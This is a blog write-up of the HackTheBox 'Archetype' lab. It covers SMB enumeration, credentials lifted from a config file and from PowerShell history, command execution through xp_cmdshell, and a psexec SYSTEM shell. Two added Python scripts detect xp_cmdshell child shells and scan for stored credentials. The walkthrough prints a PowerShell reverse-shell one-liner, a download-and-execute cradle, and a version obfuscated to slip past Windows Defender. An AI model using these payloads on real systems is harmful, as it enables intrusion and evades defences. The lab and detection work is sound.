HackTheBox: Archetype

As I had some time off today, and I've only recently found https://app.hackthebox.eu, I decided to spend some time on their "Starting Point" lab machine set and have some fun removing the rust from my memory.

The first machine we will run a simple penetration test against is called Archetype, and apparently it is a Windows machine. Let us start by enumerating the services with nmap:

$nmap -sV -sC -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-03 19:43 CEST
Nmap scan report for
Host is up (0.093s latency).
Not shown: 65523 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-03T18:03:14
|_Not valid after:  2051-04-03T18:03:14
|_ssl-date: 2021-04-03T18:07:42+00:00; +21m24s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h45m24s, deviation: 3h07m50s, median: 21m23s
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-03T11:07:33-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-03T18:07:36
|_  start_date: N/A

We can see that it is a Windows machine sharing files over SMB, and the smb-security-mode script shows the guest account was accepted, so we can try listing the shares without providing any username or password. Let us see what we can list:

$smbclient -N -L \\\\

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

We can see that backups is listed as accessible to everyone. Let us try to connect to it without a password:

$smbclient \\\\\\backups
Enter WORKGROUP\alacrau's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

		10328063 blocks of size 4096. 8208731 blocks available
smb: \> 
smb: \> pwd
Current directory is \\\backups\
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)

Let us now investigate the content of this prod.dtsConfig file:

        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

We have found our first loot file. Looking through this configuration, it looks like we are after a SQL user, sql_svc, whose credentials are stored in clear text in the connection string:

  • username: sql_svc
  • password: M3g4c0rp123

Let us try to log in with these credentials, but first let us search Metasploit to see if we can find anything interesting:

msf6 > search mssql

Matching Modules

   #   Name                                                      Disclosure Date  Rank       Check  Description
   -   ----                                                      ---------------  ----       -----  -----------
   0   exploit/windows/misc/ais_esel_server_rce                  2019-03-27       excellent  Yes    AIS logistics ESEL-Server Unauth SQL Injection RCE
   1   auxiliary/server/capture/mssql                                             normal     No     Authentication Capture: MSSQL
   31  auxiliary/admin/mssql/mssql_exec                                           normal     No     Microsoft SQL Server xp_cmdshell Command Execution

So auxiliary module 31 looks interesting (and quite notorious):

  This module will execute a Windows command on a MSSQL/MSDE instance 
  via the xp_cmdshell procedure. A valid username and password is 
  required to use this module


Let us use it (msf6 > use 31) and set up the exploit parameters:

msf6 > set PASSWORD M3g4c0rp123
PASSWORD => M3g4c0rp123
msf6 > set USERNAME sql_svc
USERNAME => sql_svc
msf6 > set RHOSTS
msf6 > set USE_WINDOWS_AUTHENT true
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   CMD                  cmd.exe /c echo OWNED  no        Command to execute
                         > C:\owned.exe
   PASSWORD             M3g4c0rp123            no        The password for the specified user
   RHOSTS                 yes       The target host(s), range CIDR iden
                                                         tifier, or hosts file with syntax '
   RPORT                1433                   yes       The target port (TCP)
   TDSENCRYPTION        false                  yes       Use TLS/SSL for TDS data "Force Enc
   USERNAME             sql_svc                no        The username to authenticate as
   USE_WINDOWS_AUTHENT  true                   yes       Use windows authentification (requi
                                                         res DOMAIN option set)

msf6 auxiliary(admin/mssql/mssql_exec) > exploit

After running this command we can easily confirm that the machine is exploitable, as we get output back from our command, so we can move on to obtaining shell access. Our reverse shell, which we will kindly name lol.ps1 and which is taken from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1, will connect back to our local netcat listener:

$sm=(New-Object Net.Sockets.TCPClient('',4242)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Let us also fire up our nc listener on port 4242 so it can wait for connections from the reverse shell above:

$nc -lvnp 4242
listening on [any] 4242 ..

We'll now start a web server to serve our reverse shell script so we can download it from inside the machine:

python -m http.server

This spawns an HTTP server on our machine on port 8000 to serve our PowerShell reverse shell. Then we set the command in Metasploit and run the exploit:

set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"\");'

When we run it, we get an antivirus message for trying to run our shell code:

msf6 auxiliary(admin/mssql/mssql_exec) > set CMD powershell 'IEX (New-Object Net.WebClient).DownloadString(\"\");'
CMD => powershell IEX (New-Object Net.WebClient).DownloadString(\"\");
msf6 auxiliary(admin/mssql/mssql_exec) > exploit
[*] Running module against

[*] - SQL Query: EXEC master..xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString(\"\");'

 IEX : At line:1 char:1
 + $client = New-Object System.Net.Sockets.TCPClient("",4242 ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 This script contains malicious content and has been blocked by your antivirus software.
 At line:1 char:1
 + IEX (New-Object Net.WebClient).DownloadString(" ...
 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
 + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.Inv

[*] Auxiliary module execution completed
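The transcript above is also what this technique looks like from the defender's side: xp_cmdshell runs its command as a child cmd.exe of the SQL Server service process, sqlservr.exe, so a process-creation feed (Sysmon Event ID 1 or equivalent) shows cmd.exe or powershell.exe descending from sqlservr.exe, here under the sql_svc service account. xp_cmdshell is disabled by default and its state can be checked through sp_configure; where it must stay enabled, this lineage is the signal to alert on. The Python script below is added for this write-up and is not part of the original post: it reconstructs parent chains from a constructed set of events in the shape of Sysmon Event ID 1 fields, flags shells whose ancestry includes sqlservr.exe, and additionally tags command lines carrying the DownloadString/IEX cradle seen above. The GUIDs, image paths, the alice user and the PLACEHOLDER host are assumptions.

```python
"""Detect shells spawned by the SQL Server service process, the footprint of
xp_cmdshell in process-creation telemetry.  Added example for this write-up,
not tooling from the original post.  SAMPLE_EVENTS are constructed in the shape
of Sysmon Event ID 1 fields; GUIDs, paths, the 'alice' user and the
PLACEHOLDER host are assumptions."""
import ntpath

SQL_SERVICE_IMAGE = "sqlservr.exe"
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Substrings marking a download-and-execute ("download cradle") command line.
CRADLE_MARKERS = ("downloadstring", "invoke-expression", "iex ", "iex(")

# Constructed sample events (Sysmon Event ID 1 shaped), not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessGuid": "S", "ParentProcessGuid": None,
     "Image": r"C:\Windows\System32\services.exe",
     "CommandLine": "services.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"ProcessGuid": "A", "ParentProcessGuid": "S",
     "Image": r"C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "CommandLine": "sqlservr.exe -sMSSQLSERVER", "User": r"ARCHETYPE\sql_svc"},
    # The module's default CMD, run through xp_cmdshell.
    {"ProcessGuid": "B", "ParentProcessGuid": "A",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo OWNED > C:\owned.exe", "User": r"ARCHETYPE\sql_svc"},
    # The download cradle: cmd.exe launched by xp_cmdshell, which launches powershell.exe.
    {"ProcessGuid": "C", "ParentProcessGuid": "A",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER:8000/lol.ps1')",
     "User": r"ARCHETYPE\sql_svc"},
    {"ProcessGuid": "D", "ParentProcessGuid": "C",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER:8000/lol.ps1')",
     "User": r"ARCHETYPE\sql_svc"},
    # Benign interactive PowerShell under explorer.exe: must not be flagged.
    {"ProcessGuid": "E", "ParentProcessGuid": None,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe", "User": r"ARCHETYPE\alice"},
    {"ProcessGuid": "F", "ParentProcessGuid": "E",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process", "User": r"ARCHETYPE\alice"},
]


def image_name(path):
    """Lower-cased file name of an Image path (ntpath handles the Windows separators)."""
    return ntpath.basename(path).lower()


def lineage(event, by_guid):
    """Image names from this process up to the root, following ParentProcessGuid.
    The seen-set guards against cycles from recycled or malformed GUIDs."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["ProcessGuid"] not in seen:
        seen.add(cur["ProcessGuid"])
        chain.append(image_name(cur["Image"]))
        cur = by_guid.get(cur["ParentProcessGuid"])
    return chain


def detect_xp_cmdshell_children(events):
    """Return a finding for every shell whose ancestry includes sqlservr.exe."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e["Image"]) not in SHELL_IMAGES:
            continue
        chain = lineage(e, by_guid)
        if SQL_SERVICE_IMAGE not in chain[1:]:
            continue  # shell is not descended from the SQL Server service
        indicators = ["shell_under_sqlservr"]
        if any(marker in e["CommandLine"].lower() for marker in CRADLE_MARKERS):
            indicators.append("download_cradle")
        findings.append({
            "ProcessGuid": e["ProcessGuid"],
            "User": e["User"],
            "lineage": " <- ".join(chain),
            "indicators": indicators,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_xp_cmdshell_children(SAMPLE_EVENTS):
        print(finding)
```

Walking the full parent chain rather than checking only the immediate parent matters because xp_cmdshell always inserts a cmd.exe between sqlservr.exe and whatever the command launches, so a rule on "parent is sqlservr.exe" would see the cmd.exe but miss the powershell.exe that does the actual work.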

In order to bypass this we need to obfuscate our PowerShell code so that Windows Defender antivirus does not detect it. For this task we used ISESteroids, available from http://www.powertheshell.com/isesteroids/. After running its "Obfuscate" tool on our script we obtain a new one:

${____/\/=\/==\__/\}=(New-Object Net.Sockets.TCPClient($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQAwAC4AMQAwAC4AMQA0AC4AMQA2ADcA'))),4242)).GetStream();[byte[]]${__/\_/=\_/\__/=\/}=0..65535|%{0};while((${___/\/=======\/\/}=${____/\/=\/==\__/\}.Read(${__/\_/=\_/\__/=\/},0,${__/\_/=\_/\__/=\/}.Length)) -ne 0){;${__/\/\/==\/=\/\_/}=(New-Object Text.ASCIIEncoding).GetString(${__/\_/=\_/\__/=\/},0,${___/\/=======\/\/});${_/==\___/=\/\__/=}=([text.encoding]::ASCII).GetBytes((iex ${__/\/\/==\/=\/\_/} 2>&1));${____/\/=\/==\__/\}.Write(${_/==\___/=\/\__/=},0,${_/==\___/=\/\__/=}.Length)}

As we can see above, some of our variable names were obfuscated and our IP address was base64-encoded. When we now run the exploit from Metasploit, we get a hit on our netcat session:

$nc -lvnp 4242
listening on [any] 4242 ...
connect to [] from (UNKNOWN) [] 49678


Now that we have a shell, we can start going through the privilege escalation checklist at https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#system-info, and we get a hit when checking the PowerShell command history:

type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!! exit
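The prod.dtsConfig connection string found earlier and this net use line are the same failure: a credential written into a file that ends up readable by others. The Python script below, added for this write-up and not a tool from the original post, scans both formats: it parses a dtsConfig file's ConfiguredValue connection strings and flags any that carry a Password or Pwd key (also noting Persist Security Info=True, which leaves the password readable from the open connection's ConnectionString), and it parses net use lines from ConsoleHost_history.txt and flags an inline password after /user: while ignoring the "*" form that prompts for it instead. Secrets are reported by length only. The sample file contents are constructed from the values shown on this page; the Source package path, the fileserver name and the S: line are assumptions.

```python
"""Scan SSIS .dtsConfig files and PowerShell console history for credentials
left in clear text.  Added example for this write-up, not a tool from the
original post.  SAMPLE_DTSCONFIG and SAMPLE_HISTORY are constructed from the
values shown in the post; the Source package path and the S: drive line are
assumptions."""
import re
import xml.etree.ElementTree as ET

SECRET_KEYS = ("password", "pwd")

# Constructed sample, shaped like the prod.dtsConfig found on the backups share.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

# Constructed sample ConsoleHost_history.txt.  The first line mirrors the one
# found on the box; the S: line shows the form that prompts for the password.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
dir C:\Users
net use S: \\fileserver\share /user:ARCHETYPE\sql_svc *
"""


def redact(secret):
    """Report only the length so findings can be shared without re-exposing the secret."""
    return "<redacted, %d chars>" % len(secret)


def parse_connection_string(value):
    """Split an OLE DB style 'Key=Value;Key=Value;' string into a dict with
    lower-cased keys.  Quoted values containing ';' are not handled."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs


def scan_dtsconfig(text):
    """Return one finding per ConfiguredValue whose connection string embeds a password."""
    findings = []
    for conf in ET.fromstring(text).iter("Configuration"):
        cs = parse_connection_string(conf.findtext("ConfiguredValue") or "")
        secret = next((cs[k] for k in SECRET_KEYS if k in cs), None)
        if secret is None:
            continue  # e.g. Integrated Security=SSPI: nothing stored in the file
        findings.append({
            "source": "dtsconfig",
            "path": conf.get("Path"),
            "user": cs.get("user id") or cs.get("uid"),
            "data_source": cs.get("data source"),
            "password": redact(secret),
            # True means the password stays readable from the open connection's ConnectionString.
            "persist_security_info": cs.get("persist security info", "").lower() == "true",
        })
    return findings


NET_USE_RE = re.compile(r"^\s*net(?:\.exe)?\s+use\b(.*)$", re.IGNORECASE)


def scan_console_history(text):
    """Return one finding per 'net use' line that passes the password inline.
    A bare token that is not a drive letter, a UNC path, a /switch or the
    '*' prompt marker is taken as the password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = NET_USE_RE.match(line)
        if not m:
            continue
        tokens = m.group(1).split()
        user = next((t.split(":", 1)[1] for t in tokens if t.lower().startswith("/user:")), None)
        password = next((t for t in tokens
                         if not (t.startswith("/") or t.startswith("\\\\")
                                 or t == "*" or re.fullmatch(r"[A-Za-z]:", t))), None)
        if user and password:
            findings.append({"source": "console_history", "line": lineno,
                             "user": user, "password": redact(password)})
    return findings


if __name__ == "__main__":
    for finding in scan_dtsconfig(SAMPLE_DTSCONFIG) + scan_console_history(SAMPLE_HISTORY):
        print(finding)
```

Run it as-is to see one finding per sample; pointing scan_dtsconfig at the contents of a real .dtsConfig and scan_console_history at a user's ConsoleHost_history.txt gives the same output shape, with the secret never echoed.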

We can now use impacket's psexec.py (https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) to open a remote shell on the machine with our newly found credentials:

$python3 psexec.py administrator@
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file PtMMrPNw.exe
[*] Opening SVCManager on
[*] Creating service SGjW on
[*] Starting service SGjW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.


nt authority\system


As we now have an admin shell on this machine, we can look around for the flags. We find them in the "Desktop" folder of the administrator:

 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\Administrator\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:36 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,834,831,872 bytes free

C:\Users\Administrator\Desktop>type root.txt

As we skipped it earlier, the user flag can be collected from the sql_svc user's desktop folder:

 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,833,373,696 bytes free

C:\Users\sql_svc\Desktop>type user.txt

Easy but fun. This platform is quite cool, so I guess I'll keep exploring; please ping me if you have any doubts.

josé tapadas alves

🪐 Recovering Telecommunications engineer and software tinkerer. Passionate Rubyist and JavaScript zealot. Nature, music and life enthusiast 🌱